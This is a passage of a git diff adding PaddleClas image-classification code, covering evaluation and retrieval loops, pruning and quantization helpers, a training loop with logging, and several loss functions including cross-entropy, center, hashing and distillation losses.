op=paddle.distributed.ReduceOp.SUM) + metric_dict[key] = metric_dict[ + key] / paddle.distributed.get_world_size() + for key in metric_dict: + if metric_key is None: + metric_key = key + if key not in output_info: + 
output_info[key] = AverageMeter(key, '7.5f') + + output_info[key].update(metric_dict[key].numpy()[0], + batch_size) + + time_info["batch_cost"].update(time.time() - tic) + + if iter_id % print_batch_step == 0: + time_msg = "s, ".join([ + "{}: {:.5f}".format(key, time_info[key].avg) + for key in time_info + ]) + + ips_msg = "ips: {:.5f} images/sec".format( + batch_size / time_info["batch_cost"].avg) + + metric_msg = ", ".join([ + "{}: {:.5f}".format(key, output_info[key].val) + for key in output_info + ]) + logger.info("[Eval][Epoch {}][Iter: {}/{}]{}, {}, {}".format( + epoch_id, iter_id, + len(engine.eval_dataloader), metric_msg, time_msg, ips_msg)) + + tic = time.time() + if engine.use_dali: + engine.eval_dataloader.reset() + metric_msg = ", ".join([ + "{}: {:.5f}".format(key, output_info[key].avg) for key in output_info + ]) + logger.info("[Eval][Epoch {}][Avg]{}".format(epoch_id, metric_msg)) + + # do not try to save best eval.model + if engine.eval_metric_func is None: + return -1 + # return 1st metric in the dict + return output_info[metric_key].avg diff --git a/Smart_container/PaddleClas/ppcls/engine/evaluation/retrieval.py b/Smart_container/PaddleClas/ppcls/engine/evaluation/retrieval.py new file mode 100644 index 0000000..bae7774 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/evaluation/retrieval.py @@ -0,0 +1,169 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import platform +import paddle +from ppcls.utils import logger + + +def retrieval_eval(engine, epoch_id=0): + engine.model.eval() + # step1. build gallery + if engine.gallery_query_dataloader is not None: + gallery_feas, gallery_img_id, gallery_unique_id = cal_feature( + engine, name='gallery_query') + query_feas, query_img_id, query_query_id = gallery_feas, gallery_img_id, gallery_unique_id + else: + gallery_feas, gallery_img_id, gallery_unique_id = cal_feature( + engine, name='gallery') + query_feas, query_img_id, query_query_id = cal_feature( + engine, name='query') + + # step2. do evaluation + sim_block_size = engine.config["Global"].get("sim_block_size", 64) + sections = [sim_block_size] * (len(query_feas) // sim_block_size) + if len(query_feas) % sim_block_size: + sections.append(len(query_feas) % sim_block_size) + fea_blocks = paddle.split(query_feas, num_or_sections=sections) + if query_query_id is not None: + query_id_blocks = paddle.split( + query_query_id, num_or_sections=sections) + image_id_blocks = paddle.split(query_img_id, num_or_sections=sections) + metric_key = None + + if engine.eval_loss_func is None: + metric_dict = {metric_key: 0.} + else: + metric_dict = dict() + for block_idx, block_fea in enumerate(fea_blocks): + similarity_matrix = paddle.matmul( + block_fea, gallery_feas, transpose_y=True) + if query_query_id is not None: + query_id_block = query_id_blocks[block_idx] + query_id_mask = (query_id_block != gallery_unique_id.t()) + + image_id_block = image_id_blocks[block_idx] + image_id_mask = (image_id_block != gallery_img_id.t()) + + keep_mask = paddle.logical_or(query_id_mask, image_id_mask) + similarity_matrix = similarity_matrix * keep_mask.astype( + "float32") + else: + keep_mask = None + + metric_tmp = engine.eval_metric_func(similarity_matrix, + image_id_blocks[block_idx], + gallery_img_id, keep_mask) + + for key in 
metric_tmp: + if key not in metric_dict: + metric_dict[key] = metric_tmp[key] * block_fea.shape[ + 0] / len(query_feas) + else: + metric_dict[key] += metric_tmp[key] * block_fea.shape[ + 0] / len(query_feas) + + metric_info_list = [] + for key in metric_dict: + if metric_key is None: + metric_key = key + metric_info_list.append("{}: {:.5f}".format(key, metric_dict[key])) + metric_msg = ", ".join(metric_info_list) + logger.info("[Eval][Epoch {}][Avg]{}".format(epoch_id, metric_msg)) + + return metric_dict[metric_key] + + +def cal_feature(engine, name='gallery'): + all_feas = None + all_image_id = None + all_unique_id = None + has_unique_id = False + + if name == 'gallery': + dataloader = engine.gallery_dataloader + elif name == 'query': + dataloader = engine.query_dataloader + elif name == 'gallery_query': + dataloader = engine.gallery_query_dataloader + else: + raise RuntimeError("Only support gallery or query dataset") + + max_iter = len(dataloader) - 1 if platform.system() == "Windows" else len( + dataloader) + for idx, batch in enumerate(dataloader): # load is very time-consuming + if idx >= max_iter: + break + if idx % engine.config["Global"]["print_batch_step"] == 0: + logger.info( + f"{name} feature calculation process: [{idx}/{len(dataloader)}]" + ) + if engine.use_dali: + batch = [ + paddle.to_tensor(batch[0]['data']), + paddle.to_tensor(batch[0]['label']) + ] + batch = [paddle.to_tensor(x) for x in batch] + batch[1] = batch[1].reshape([-1, 1]).astype("int64") + if len(batch) == 3: + has_unique_id = True + batch[2] = batch[2].reshape([-1, 1]).astype("int64") + out = engine.model(batch[0], batch[1]) + batch_feas = out["features"] + + # do norm + if engine.config["Global"].get("feature_normalize", True): + feas_norm = paddle.sqrt( + paddle.sum(paddle.square(batch_feas), axis=1, keepdim=True)) + batch_feas = paddle.divide(batch_feas, feas_norm) + + # do binarize + if engine.config["Global"].get("feature_binarize") == "round": + batch_feas = 
paddle.round(batch_feas).astype("float32") * 2.0 - 1.0 + + if engine.config["Global"].get("feature_binarize") == "sign": + batch_feas = paddle.sign(batch_feas).astype("float32") + + if all_feas is None: + all_feas = batch_feas + if has_unique_id: + all_unique_id = batch[2] + all_image_id = batch[1] + else: + all_feas = paddle.concat([all_feas, batch_feas]) + all_image_id = paddle.concat([all_image_id, batch[1]]) + if has_unique_id: + all_unique_id = paddle.concat([all_unique_id, batch[2]]) + + if engine.use_dali: + dataloader.reset() + + if paddle.distributed.get_world_size() > 1: + feat_list = [] + img_id_list = [] + unique_id_list = [] + paddle.distributed.all_gather(feat_list, all_feas) + paddle.distributed.all_gather(img_id_list, all_image_id) + all_feas = paddle.concat(feat_list, axis=0) + all_image_id = paddle.concat(img_id_list, axis=0) + if has_unique_id: + paddle.distributed.all_gather(unique_id_list, all_unique_id) + all_unique_id = paddle.concat(unique_id_list, axis=0) + + logger.info("Build {} done, all feat shape: {}, begin to eval..".format( + name, all_feas.shape)) + return all_feas, all_image_id, all_unique_id diff --git a/Smart_container/PaddleClas/ppcls/engine/slim/__init__.py b/Smart_container/PaddleClas/ppcls/engine/slim/__init__.py new file mode 100644 index 0000000..bdf067a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/slim/__init__.py @@ -0,0 +1,16 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+# See the License for the specific language governing permissions and +# limitations under the License. + +from ppcls.engine.slim.prune import get_pruner +from ppcls.engine.slim.quant import get_quaner diff --git a/Smart_container/PaddleClas/ppcls/engine/slim/prune.py b/Smart_container/PaddleClas/ppcls/engine/slim/prune.py new file mode 100644 index 0000000..fc28452 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/slim/prune.py @@ -0,0 +1,66 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
from __future__ import absolute_import, division, print_function
import paddle
from ppcls.utils import logger


def get_pruner(config, model):
    """Build a PaddleSlim filter pruner for ``model`` and prune it in place.

    Args:
        config (dict): global config. Pruning is enabled only when
            ``config["Slim"]["prune"]`` is present; ``Slim.prune.name``
            selects the criterion ("fpgm" or "l1_norm").
        model (paddle.nn.Layer): network to prune (modified in place).

    Returns:
        A paddleslim dygraph pruner instance, or None when pruning is not
        configured.
    """
    if config.get("Slim", False) and config["Slim"].get("prune", False):
        import paddleslim
        prune_method_name = config["Slim"]["prune"]["name"].lower()
        assert prune_method_name in [
            "fpgm", "l1_norm"
        ], "The prune methods only support 'fpgm' and 'l1_norm'"
        # the pruner traces the model with a dummy input of shape
        # [1] + Global.image_shape (i.e. batch size 1)
        if prune_method_name == "fpgm":
            pruner = paddleslim.dygraph.FPGMFilterPruner(
                model, [1] + config["Global"]["image_shape"])
        else:
            pruner = paddleslim.dygraph.L1NormFilterPruner(
                model, [1] + config["Global"]["image_shape"])

        # prune model
        _prune_model(pruner, config, model)
    else:
        pruner = None

    return pruner


def _prune_model(pruner, config, model):
    """Prune every Conv2D weight by ``Slim.prune.pruned_ratio`` and log the
    FLOPs before/after as well as the resulting conv parameter shapes."""
    from paddleslim.analysis import dygraph_flops as flops
    logger.info("FLOPs before pruning: {}GFLOPs".format(
        flops(model, [1] + config["Global"]["image_shape"]) / 1e9))
    model.eval()

    # collect names of parameters that belong directly to Conv2D layers —
    # only conv filters are pruned
    params = []
    for sublayer in model.sublayers():
        for param in sublayer.parameters(include_sublayers=False):
            if isinstance(sublayer, paddle.nn.Conv2D):
                params.append(param.name)
    # apply the same pruned ratio to every conv, pruning along axis 0
    ratios = {}
    for param in params:
        ratios[param] = config["Slim"]["prune"]["pruned_ratio"]
    plan = pruner.prune_vars(ratios, [0])

    logger.info("FLOPs after pruning: {}GFLOPs; pruned ratio: {}".format(
        flops(model, [1] + config["Global"]["image_shape"]) / 1e9,
        plan.pruned_flops))

    # log the new shape of every conv weight for inspection
    for param in model.parameters():
        if "conv2d" in param.name:
            logger.info("{}\t{}".format(param.name, param.shape))

    model.train()
from __future__ import absolute_import, division, print_function
import paddle
from ppcls.utils import logger

# Default PaddleSlim QAT configuration; ``activation_preprocess_type`` is
# overwritten to "PACT" in get_quaner before use.
QUANT_CONFIG = {
    # weight preprocess type, default is None and no preprocessing is performed.
    'weight_preprocess_type': None,
    # activation preprocess type, default is None and no preprocessing is performed.
    'activation_preprocess_type': None,
    # weight quantize type, default is 'channel_wise_abs_max'
    'weight_quantize_type': 'channel_wise_abs_max',
    # activation quantize type, default is 'moving_average_abs_max'
    'activation_quantize_type': 'moving_average_abs_max',
    # weight quantize bit num, default is 8
    'weight_bits': 8,
    # activation quantize bit num, default is 8
    'activation_bits': 8,
    # data type after quantization, such as 'uint8', 'int8', etc. default is 'int8'
    'dtype': 'int8',
    # window size for 'range_abs_max' quantization. default is 10000
    'window_size': 10000,
    # The decay coefficient of moving average, default is 0.9
    'moving_rate': 0.9,
    # for dygraph quantization, layers of type in quantizable_layer_type will be quantized
    'quantizable_layer_type': ['Conv2D', 'Linear'],
}


def get_quaner(config, model):
    """Optionally wrap ``model`` for quantization-aware training (QAT).

    QAT is enabled only when ``config["Slim"]["quant"]`` is present; only the
    PACT method is accepted. ``quanter.quantize`` modifies the model in place.

    Returns:
        The PaddleSlim QAT quanter, or None when quantization is not
        configured.

    NOTE(review): "quaner" looks like a typo for "quanter", but it is the
    public name imported by ppcls.engine.slim — it must stay unchanged.
    """
    if config.get("Slim", False) and config["Slim"].get("quant", False):
        from paddleslim.dygraph.quant import QAT
        assert config["Slim"]["quant"]["name"].lower(
        ) == 'pact', 'Only PACT quantization method is supported now'
        QUANT_CONFIG["activation_preprocess_type"] = "PACT"
        quanter = QAT(config=QUANT_CONFIG)
        quanter.quantize(model)
        logger.info("QAT model summary:")
        # summary uses a fixed dummy input — assumes 3x224x224 images; the
        # summary call is for logging only and does not affect quantization
        paddle.summary(model, (1, 3, 224, 224))
    else:
        quanter = None
    return quanter
from __future__ import absolute_import, division, print_function

import time
import paddle
from ppcls.engine.train.utils import update_loss, update_metric, log_info


def train_epoch(engine, epoch_id, print_batch_step):
    """Run one training epoch: forward, loss, backward, optimizer/lr step,
    plus metric/loss bookkeeping and periodic logging.

    Args:
        engine: trainer object (model, dataloader, optimizer, amp state...).
        epoch_id (int): current epoch index, used for logging only.
        print_batch_step (int): log every this many iterations.
    """
    tic = time.time()
    for iter_id, batch in enumerate(engine.train_dataloader):
        if iter_id >= engine.max_iter:
            break
        # reset timers after the first few warm-up iters so that averaged
        # reader/batch costs exclude startup overhead
        if iter_id == 5:
            for key in engine.time_info:
                engine.time_info[key].reset()
        engine.time_info["reader_cost"].update(time.time() - tic)
        if engine.use_dali:
            # DALI yields [{'data': ..., 'label': ...}]
            batch = [
                paddle.to_tensor(batch[0]['data']),
                paddle.to_tensor(batch[0]['label'])
            ]
        batch_size = batch[0].shape[0]
        if not engine.config["Global"].get("use_multilabel", False):
            batch[1] = batch[1].reshape([-1, 1]).astype("int64")
        engine.global_step += 1

        # image input
        if engine.amp:
            # ops in the black list stay in fp32 under auto mixed precision
            with paddle.amp.auto_cast(custom_black_list={
                    "flatten_contiguous_range", "greater_than"
            }):
                out = forward(engine, batch)
                loss_dict = engine.train_loss_func(out, batch[1])
        else:
            out = forward(engine, batch)

            # calc loss
            # NOTE(review): the batch_transform_ops branch exists only on the
            # non-amp path — confirm whether amp + mix transforms is intended
            # to be unsupported.
            if engine.config["DataLoader"]["Train"]["dataset"].get(
                    "batch_transform_ops", None):
                # mix-style transforms (mixup/cutmix) pack extra targets
                # after the image, so pass everything past batch[0]
                loss_dict = engine.train_loss_func(out, batch[1:])
            else:
                loss_dict = engine.train_loss_func(out, batch[1])

        # step opt and lr
        if engine.amp:
            scaled = engine.scaler.scale(loss_dict["loss"])
            scaled.backward()
            engine.scaler.minimize(engine.optimizer, scaled)
        else:
            loss_dict["loss"].backward()
            engine.optimizer.step()
        engine.optimizer.clear_grad()
        engine.lr_sch.step()

        # below code just for logging
        # update metric_for_logger
        update_metric(engine, out, batch, batch_size)
        # update_loss_for_logger
        update_loss(engine, loss_dict, batch_size)
        engine.time_info["batch_cost"].update(time.time() - tic)
        if iter_id % print_batch_step == 0:
            log_info(engine, batch_size, epoch_id, iter_id)
        tic = time.time()


def forward(engine, batch):
    """Model forward; recognition models also consume the label (batch[1])."""
    if not engine.is_rec:
        return engine.model(batch[0])
    else:
        return engine.model(batch[0], batch[1])
from __future__ import absolute_import, division, print_function

import datetime
from ppcls.utils import logger
from ppcls.utils.misc import AverageMeter


def update_metric(trainer, out, batch, batch_size):
    """Compute the configured train metrics for this step and fold them into
    ``trainer.output_info`` running averages (no-op if no metric func)."""
    # calc metric
    if trainer.train_metric_func is not None:
        # batch[-1] is the (last) target tensor
        metric_dict = trainer.train_metric_func(out, batch[-1])
        for key in metric_dict:
            if key not in trainer.output_info:
                trainer.output_info[key] = AverageMeter(key, '7.5f')
            trainer.output_info[key].update(metric_dict[key].numpy()[0],
                                            batch_size)


def update_loss(trainer, loss_dict, batch_size):
    """Fold this step's loss values into ``trainer.output_info`` averages."""
    # update_output_info
    for key in loss_dict:
        if key not in trainer.output_info:
            trainer.output_info[key] = AverageMeter(key, '7.5f')
        trainer.output_info[key].update(loss_dict[key].numpy()[0], batch_size)


def log_info(trainer, batch_size, epoch_id, iter_id):
    """Log lr / metrics / timing / throughput / ETA for one train iteration
    and push lr plus per-metric scalars to the VisualDL writer."""
    lr_msg = "lr: {:.5f}".format(trainer.lr_sch.get_lr())
    metric_msg = ", ".join([
        "{}: {:.5f}".format(key, trainer.output_info[key].avg)
        for key in trainer.output_info
    ])
    time_msg = "s, ".join([
        "{}: {:.5f}".format(key, trainer.time_info[key].avg)
        for key in trainer.time_info
    ])

    ips_msg = "ips: {:.5f} images/sec".format(
        batch_size / trainer.time_info["batch_cost"].avg)
    # remaining iterations * average iteration cost
    # NOTE(review): the "+ 1" assumes epoch_id is 1-based — confirm with caller
    eta_sec = ((trainer.config["Global"]["epochs"] - epoch_id + 1
                ) * len(trainer.train_dataloader) - iter_id
               ) * trainer.time_info["batch_cost"].avg
    eta_msg = "eta: {:s}".format(str(datetime.timedelta(seconds=int(eta_sec))))
    logger.info("[Train][Epoch {}/{}][Iter: {}/{}]{}, {}, {}, {}, {}".format(
        epoch_id, trainer.config["Global"]["epochs"], iter_id,
        len(trainer.train_dataloader), lr_msg, metric_msg, time_msg, ips_msg,
        eta_msg))

    logger.scaler(
        name="lr",
        value=trainer.lr_sch.get_lr(),
        step=trainer.global_step,
        writer=trainer.vdl_writer)
    for key in trainer.output_info:
        logger.scaler(
            name="train_{}".format(key),
            value=trainer.output_info[key].avg,
            step=trainer.global_step,
            writer=trainer.vdl_writer)
import copy

import paddle
import paddle.nn as nn
from ppcls.utils import logger

from .celoss import CELoss, MixCELoss
from .googlenetloss import GoogLeNetLoss
from .centerloss import CenterLoss
from .emlloss import EmlLoss
from .msmloss import MSMLoss
from .npairsloss import NpairsLoss
from .trihardloss import TriHardLoss
from .triplet import TripletLoss, TripletLossV2
from .supconloss import SupConLoss
from .pairwisecosface import PairwiseCosface
from .dmlloss import DMLLoss
from .distanceloss import DistanceLoss

from .distillationloss import DistillationCELoss
from .distillationloss import DistillationGTCELoss
from .distillationloss import DistillationDMLLoss
from .multilabelloss import MultiLabelLoss


class CombinedLoss(nn.Layer):
    """Weighted sum of several loss functions described by a config list.

    Each config entry has the form ``{LossClassName: {**kwargs, "weight": w}}``;
    the named class is instantiated with the remaining kwargs and its outputs
    are scaled by ``w``. The summed total is stored under key "loss".
    """

    def __init__(self, config_list):
        super().__init__()
        self.loss_func = []
        self.loss_weight = []
        assert isinstance(config_list, list), (
            'operator config should be a list')
        for config in config_list:
            assert isinstance(config,
                              dict) and len(config) == 1, "yaml format error"
            name = list(config)[0]
            param = config[name]
            assert "weight" in param, "weight must be in param, but param just contains {}".format(
                param.keys())
            self.loss_weight.append(param.pop("weight"))
            # instantiate the loss class named in the config (must be one of
            # the classes imported above)
            self.loss_func.append(eval(name)(**param))

    def __call__(self, input, batch):
        loss_dict = {}
        for idx, loss_func in enumerate(self.loss_func):
            loss = loss_func(input, batch)
            weight = self.loss_weight[idx]
            # scale every sub-loss of this term by its configured weight
            loss = {key: loss[key] * weight for key in loss}
            loss_dict.update(loss)
        loss_dict["loss"] = paddle.add_n(list(loss_dict.values()))
        return loss_dict


def build_loss(config):
    """Factory: build a CombinedLoss from a (deep-copied) loss config list."""
    module_class = CombinedLoss(copy.deepcopy(config))
    logger.debug("build loss {} success.".format(module_class))
    return module_class


import paddle
import paddle.nn as nn
import paddle.nn.functional as F


class CELoss(nn.Layer):
    """
    Cross entropy loss, optionally with label smoothing.
    """

    def __init__(self, epsilon=None):
        super().__init__()
        # epsilon in (0, 1) enables label smoothing; anything else disables it
        if epsilon is not None and (epsilon <= 0 or epsilon >= 1):
            epsilon = None
        self.epsilon = epsilon

    def _labelsmoothing(self, target, class_num):
        """Return a smoothed soft-label tensor reshaped to [-1, class_num]."""
        if len(target.shape) == 1 or target.shape[-1] != class_num:
            # hard labels: convert to one-hot before smoothing
            one_hot_target = F.one_hot(target, class_num)
        else:
            one_hot_target = target
        soft_target = F.label_smooth(one_hot_target, epsilon=self.epsilon)
        soft_target = paddle.reshape(soft_target, shape=[-1, class_num])
        return soft_target

    def forward(self, x, label):
        if isinstance(x, dict):
            x = x["logits"]
        if self.epsilon is not None:
            # label smoothing path: manual soft cross entropy
            class_num = x.shape[-1]
            label = self._labelsmoothing(label, class_num)
            x = -F.log_softmax(x, axis=-1)
            loss = paddle.sum(x * label, axis=-1)
        else:
            if label.shape[-1] == x.shape[-1]:
                # label already class-dim wide: treat it as a soft label.
                # NOTE(review): softmax is applied to the label, which assumes
                # the soft label arrives as raw (teacher) logits — confirm.
                label = F.softmax(label, axis=-1)
                soft_label = True
            else:
                soft_label = False
            loss = F.cross_entropy(x, label=label, soft_label=soft_label)
        loss = loss.mean()
        return {"CELoss": loss}


class MixCELoss(CELoss):
    """
    Cross entropy loss with mix(mixup, cutmix, fixmix): interpolates the CE
    of two target sets with coefficient lam.
    """

    def __init__(self, epsilon=None):
        # NOTE(review): epsilon is stored as-is here, bypassing the (0, 1)
        # validation CELoss.__init__ performs — confirm intended.
        super().__init__()
        self.epsilon = epsilon

    def __call__(self, input, batch):
        # batch carries both target sets and the mixing coefficient
        target0, target1, lam = batch
        loss0 = super().forward(input, target0)["CELoss"]
        loss1 = super().forward(input, target1)["CELoss"]
        loss = lam * loss0 + (1.0 - lam) * loss1
        loss = paddle.mean(loss)
        return {"MixCELoss": loss}


from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import paddle
import paddle.nn as nn
import paddle.nn.functional as F


class CenterLoss(nn.Layer):
    """Center loss: mean squared distance of each feature to its class center.

    NOTE(review): centers are created with paddle.randn as plain tensors (not
    Parameters), so the optimizer does not update them — confirm intended.
    """

    def __init__(self, num_classes=5013, feat_dim=2048):
        super(CenterLoss, self).__init__()
        self.num_classes = num_classes
        self.feat_dim = feat_dim
        self.centers = paddle.randn(
            shape=[self.num_classes, self.feat_dim]).astype(
                "float64")  # random center

    def __call__(self, input, target):
        """
        input: network output dict {"features": ..., "logits": ...}
        target: image label
        """
        feats = input["features"]
        labels = target
        batch_size = feats.shape[0]

        # squared feature norms, expanded to [batch_size, num_classes]
        dist1 = paddle.sum(paddle.square(feats), axis=1, keepdim=True)
        dist1 = paddle.expand(dist1, [batch_size, self.num_classes])

        # squared center norms, expanded/transposed to the same shape
        dist2 = paddle.sum(paddle.square(self.centers), axis=1,
                           keepdim=True)  # num_classes
        dist2 = paddle.expand(dist2,
                              [self.num_classes, batch_size]).astype("float64")
        dist2 = paddle.transpose(dist2, [1, 0])

        # ||x||^2 + ||c||^2 - 2*x.c -> squared euclidean distance matrix
        distmat = paddle.add(dist1, dist2)
        tmp = paddle.matmul(feats, paddle.transpose(self.centers, [1, 0]))
        distmat = distmat - 2.0 * tmp

        # mask selecting, per row, the column of the ground-truth class
        classes = paddle.arange(self.num_classes).astype("int64")
        labels = paddle.expand(
            paddle.unsqueeze(labels, 1), (batch_size, self.num_classes))
        mask = paddle.equal(
            paddle.expand(classes, [batch_size, self.num_classes]),
            labels).astype("float64")  # get mask

        # mean (clipped) distance of each sample to its own-class center
        dist = paddle.multiply(distmat, mask)
        loss = paddle.sum(paddle.clip(dist, min=1e-12, max=1e+12)) / batch_size

        return {'CenterLoss': loss}
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np + + +def rerange_index(batch_size, samples_each_class): + tmp = np.arange(0, batch_size * batch_size) + tmp = tmp.reshape(-1, batch_size) + rerange_index = [] + + for i in range(batch_size): + step = i // samples_each_class + start = step * samples_each_class + end = (step + 1) * samples_each_class + + pos_idx = [] + neg_idx = [] + for j, k in enumerate(tmp[i]): + if j >= start and j < end: + if j == i: + pos_idx.insert(0, k) + else: + pos_idx.append(k) + else: + neg_idx.append(k) + rerange_index += (pos_idx + neg_idx) + + rerange_index = np.array(rerange_index).astype(np.int32) + return rerange_index diff --git a/Smart_container/PaddleClas/ppcls/loss/deephashloss.py b/Smart_container/PaddleClas/ppcls/loss/deephashloss.py new file mode 100644 index 0000000..44c08ef --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/deephashloss.py @@ -0,0 +1,90 @@ +#copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +#Licensed under the Apache License, Version 2.0 (the "License"); +#you may not use this file except in compliance with the License. +#You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +#Unless required by applicable law or agreed to in writing, software +#distributed under the License is distributed on an "AS IS" BASIS, +#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +#See the License for the specific language governing permissions and +#limitations under the License. 
import paddle
import paddle.nn as nn


class DSHSDLoss(nn.Layer):
    """
    # DSHSD(IEEE ACCESS 2019)
    # paper [Deep Supervised Hashing Based on Stable Distribution](https://ieeexplore.ieee.org/document/8648432/)
    # [DSHSD] epoch:70, bit:48, dataset:cifar10-1, MAP:0.809, Best MAP: 0.809
    # [DSHSD] epoch:250, bit:48, dataset:nuswide_21, MAP:0.809, Best MAP: 0.815
    # [DSHSD] epoch:135, bit:48, dataset:imagenet, MAP:0.647, Best MAP: 0.647
    """

    def __init__(self, n_class, bit, alpha, multi_label=False):
        super(DSHSDLoss, self).__init__()
        self.m = 2 * bit  # distance margin for dissimilar pairs
        self.alpha = alpha  # weight of the hashing (distance) term
        self.multi_label = multi_label
        self.n_class = n_class
        # auxiliary classifier on top of the tanh-ed hash feature
        self.fc = paddle.nn.Linear(bit, n_class, bias_attr=False)

    def forward(self, input, label):
        feature = input["features"]
        feature = feature.tanh().astype("float32")

        # pairwise squared euclidean distances between hash features
        dist = paddle.sum(
            paddle.square(
                (paddle.unsqueeze(feature, 1) - paddle.unsqueeze(feature, 0))),
            axis=2)

        # label to one-hot
        label = paddle.flatten(label)
        label = paddle.nn.functional.one_hot(label,
                                             self.n_class).astype("float32")

        # s == 1 for pairs sharing no label (dissimilar), 0 otherwise
        s = (paddle.matmul(
            label, label, transpose_y=True) == 0).astype("float32")
        # similar pairs pulled together; dissimilar pushed to margin m
        Ld = (1 - s) / 2 * dist + s / 2 * (self.m - dist).clip(min=0)
        Ld = Ld.mean()

        logits = self.fc(feature)
        if self.multi_label:
            # multiple labels classification loss
            Lc = (logits - label * logits + (
                (1 + (-logits).exp()).log())).sum(axis=1).mean()
        else:
            # single labels classification loss
            Lc = (-paddle.nn.functional.softmax(logits).log() * label).sum(
                axis=1).mean()

        return {"dshsdloss": Lc + Ld * self.alpha}


class LCDSHLoss(nn.Layer):
    """
    # paper [Locality-Constrained Deep Supervised Hashing for Image Retrieval](https://www.ijcai.org/Proceedings/2017/0499.pdf)
    # [LCDSH] epoch:145, bit:48, dataset:cifar10-1, MAP:0.798, Best MAP: 0.798
    # [LCDSH] epoch:183, bit:48, dataset:nuswide_21, MAP:0.833, Best MAP: 0.834
    """

    def __init__(self, n_class, _lambda):
        super(LCDSHLoss, self).__init__()
        self._lambda = _lambda  # weight of the quantization consistency term
        self.n_class = n_class

    def forward(self, input, label):
        feature = input["features"]

        # label to one-hot
        label = paddle.flatten(label)
        label = paddle.nn.functional.one_hot(label,
                                             self.n_class).astype("float32")

        # s in {-1, +1}: +1 when the pair shares at least one label
        s = 2 * (paddle.matmul(
            label, label, transpose_y=True) > 0).astype("float32") - 1
        inner_product = paddle.matmul(feature, feature, transpose_y=True) * 0.5

        # pairwise likelihood term, clipped for numerical stability
        inner_product = inner_product.clip(min=-50, max=50)
        L1 = paddle.log(1 + paddle.exp(-s * inner_product)).mean()

        # quantization term: keep real-valued and binarized (sign) pairwise
        # similarities close
        b = feature.sign()
        inner_product_ = paddle.matmul(b, b, transpose_y=True) * 0.5
        sigmoid = paddle.nn.Sigmoid()
        L2 = (sigmoid(inner_product) - sigmoid(inner_product_)).pow(2).mean()

        return {"lcdshloss": L1 + self._lambda * L2}
import paddle
import paddle.nn as nn
import paddle.nn.functional as F

from paddle.nn import L1Loss
from paddle.nn import MSELoss as L2Loss
from paddle.nn import SmoothL1Loss


class DistanceLoss(nn.Layer):
    """Elementwise distance loss wrapper.

    mode selects the underlying paddle loss: "l1", "l2" (MSE) or "smooth_l1";
    extra kwargs are forwarded to it. The result dict is keyed
    "loss_<mode>" so several distance losses can coexist in a combined loss.
    """

    def __init__(self, mode="l2", **kargs):
        super().__init__()
        # dispatch table instead of an if/elif chain
        supported = {
            "l1": nn.L1Loss,
            "l2": nn.MSELoss,
            "smooth_l1": nn.SmoothL1Loss,
        }
        assert mode in supported
        self.loss_func = supported[mode](**kargs)
        self.mode = mode

    def forward(self, x, y):
        return {"loss_{}".format(self.mode): self.loss_func(x, y)}
import paddle
import paddle.nn as nn

from .celoss import CELoss
from .dmlloss import DMLLoss
from .distanceloss import DistanceLoss


class DistillationCELoss(CELoss):
    """
    DistillationCELoss: cross entropy between pairs of model outputs
    (``predicts[pair[0]]`` vs ``predicts[pair[1]]``), e.g. student vs teacher;
    the second output of each pair plays the role of the (soft) label.
    """

    def __init__(self,
                 model_name_pairs=[],
                 epsilon=None,
                 key=None,
                 name="loss_ce"):
        super().__init__(epsilon=epsilon)
        assert isinstance(model_name_pairs, list)
        # optional sub-key to pick from each model's output dict
        self.key = key
        self.model_name_pairs = model_name_pairs
        self.name = name

    def forward(self, predicts, batch):
        loss_dict = dict()
        for idx, pair in enumerate(self.model_name_pairs):
            out1 = predicts[pair[0]]
            out2 = predicts[pair[1]]
            if self.key is not None:
                out1 = out1[self.key]
                out2 = out2[self.key]
            loss = super().forward(out1, out2)
            for key in loss:
                loss_dict["{}_{}_{}".format(key, pair[0], pair[1])] = loss[key]
        return loss_dict


class DistillationGTCELoss(CELoss):
    """
    DistillationGTCELoss: cross entropy of each named model's output against
    the ground-truth labels in ``batch``.
    """

    def __init__(self,
                 model_names=[],
                 epsilon=None,
                 key=None,
                 name="loss_gt_ce"):
        super().__init__(epsilon=epsilon)
        assert isinstance(model_names, list)
        self.key = key
        self.model_names = model_names
        self.name = name

    def forward(self, predicts, batch):
        loss_dict = dict()
        for idx, name in enumerate(self.model_names):
            out = predicts[name]
            if self.key is not None:
                out = out[self.key]
            loss = super().forward(out, batch)
            for key in loss:
                loss_dict["{}_{}".format(key, name)] = loss[key]
        return loss_dict


class DistillationDMLLoss(DMLLoss):
    """
    DistillationDMLLoss: symmetric KL (DML) loss between pairs of model
    outputs named in ``model_name_pairs``.
    """

    def __init__(self,
                 model_name_pairs=[],
                 act=None,
                 key=None,
